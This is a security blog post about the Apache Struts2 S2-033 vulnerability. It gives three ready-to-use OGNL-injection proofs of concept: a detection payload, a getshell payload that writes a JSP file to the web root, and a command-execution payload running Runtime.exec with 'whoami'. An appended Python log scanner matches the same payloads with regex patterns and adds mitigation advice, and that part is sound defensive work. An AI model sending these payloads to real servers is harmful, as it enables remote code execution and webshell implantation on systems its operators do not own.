s2-033: three POCs + command-execution bypass

Posted on 2016-6-7 16:39:38
S2-033 background:

      The vulnerability builds on S2-032: it is again caused by the `method` value not being filtered, but the S2-032 payload has to be transformed before it can be used for detection.

      Dynamic method invocation must be enabled (true)

      The REST plugin must be in use

REST introduction:
      Requests take the form http://localhost:8080/bee/action-name/1/XXX, where XXX can in fact be any legal name.

      Struts2 looks up a method named XXX and invokes it; for example, for the request http://localhost:8080/bee/test/1/abc, TestAction's public String abc() is invoked.



Detection POC:

      %23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23parameters.content[0]),%23wr.close(),xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=2908
getshell POC:

      %23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23a%3d%23parameters.reqobj[0],%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get(%23a),%23b%3d%23req.getRealPath(%23c)%2b%23parameters.reqobj[2],%23fos%3dnew java.io.FileOutputStream(%23b),%23fos.write(%23parameters.content[0].getBytes()),%23fos.close(),%23hh%3d%23context.get(%23parameters.rpsobj[0]),%23hh.getWriter().println(%23b),%23hh.getWriter().flush(),%23hh.getWriter().close(),%23parameters.command[0].toString.json?&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&reqobj=%2f&reqobj=test.jsp&content=内容

Screenshot: http://static.wooyun.org/upload/image/201606/2016060713493645563.png

Command-execution POC:

      %23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23xx%3d123,%23rs%3d@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23rs),%23wr.close(),%23xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=2908&command=whoami

Screenshot: http://static.wooyun.org/upload/image/201606/2016060713503553096.png
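As an added defensive example (not part of the original post, and not code from the Struts project): a small Python scanner that URL-decodes the request target of each access-log line and flags the OGNL indicators that all three payloads above share, plus the Runtime/FileOutputStream markers specific to the command-execution and getshell variants. The log lines are constructed for this example; the first and third carry the post's detection and command-execution payloads against a hypothetical /bee/orders action, the second is a benign request.

```python
import re
from urllib.parse import unquote

# Indicators shared by the three S2-033 payloads quoted in the post above.
# Matching happens after URL-decoding, so %23 (#) and %3d (=) encodings are caught.
INDICATORS = {
    "member_access_reset": re.compile(r"#_memberAccess\s*=", re.IGNORECASE),
    "default_member_access": re.compile(r"@ognl\.OgnlContext@DEFAULT_MEMBER_ACCESS", re.IGNORECASE),
    "context_lookup": re.compile(r"#context\s*(\.get\(|\[)", re.IGNORECASE),
    "runtime_exec": re.compile(r"java\.lang\.Runtime@getRuntime\(\)\.exec", re.IGNORECASE),
    "file_write": re.compile(r"java\.io\.FileOutputStream", re.IGNORECASE),
}

# Common Log Format line; the request target is everything up to the next space.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def decode_target(target: str, max_rounds: int = 3) -> str:
    """URL-decode repeatedly so double-encoded payloads (%2523 -> %23 -> #) are normalised."""
    for _ in range(max_rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target


def match_indicators(target: str) -> list:
    """Return the names of every indicator present in the decoded request target."""
    decoded = decode_target(target)
    return [name for name, rx in INDICATORS.items() if rx.search(decoded)]


def scan_log(text: str) -> list:
    """Scan access-log text; return one hit per line that carries at least one indicator."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable CLF line; skip rather than crash the scan
        found = match_indicators(m.group("target"))
        if found:
            hits.append({"line_no": line_no, "client": m.group("client"),
                         "status": int(m.group("status")), "indicators": found})
    return hits


# Constructed sample log (client IPs, action path and timestamps are made up for this example).
SAMPLE_LOG = """\
10.0.0.5 - - [07/Jun/2016:16:39:38 +0800] "GET /bee/orders/3/%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23parameters.content[0]),%23wr.close(),xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=2908 HTTP/1.1" 200 12
10.0.0.6 - - [07/Jun/2016:16:40:01 +0800] "GET /bee/orders/3/edit HTTP/1.1" 200 5120
10.0.0.7 - - [07/Jun/2016:16:40:15 +0800] "GET /bee/orders/3/%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23xx%3d123,%23rs%3d@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23rs),%23wr.close(),%23xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=2908&command=whoami HTTP/1.1" 200 40
"""

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit['line_no']} from {hit['client']} (HTTP {hit['status']}): "
              f"{', '.join(hit['indicators'])}")
```

The `member_access_reset` and `default_member_access` indicators are the ones to alert on: every payload on the page starts by resetting `#_memberAccess`, whereas a legitimate REST method name never contains `#` or `@`. Since the post names dynamic method invocation as a precondition, setting the Struts constant `struts.enable.DynamicMethodInvocation` to `false` in struts.xml removes that precondition; upgrading to a Struts release that fixes S2-033 is the proper remedy.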
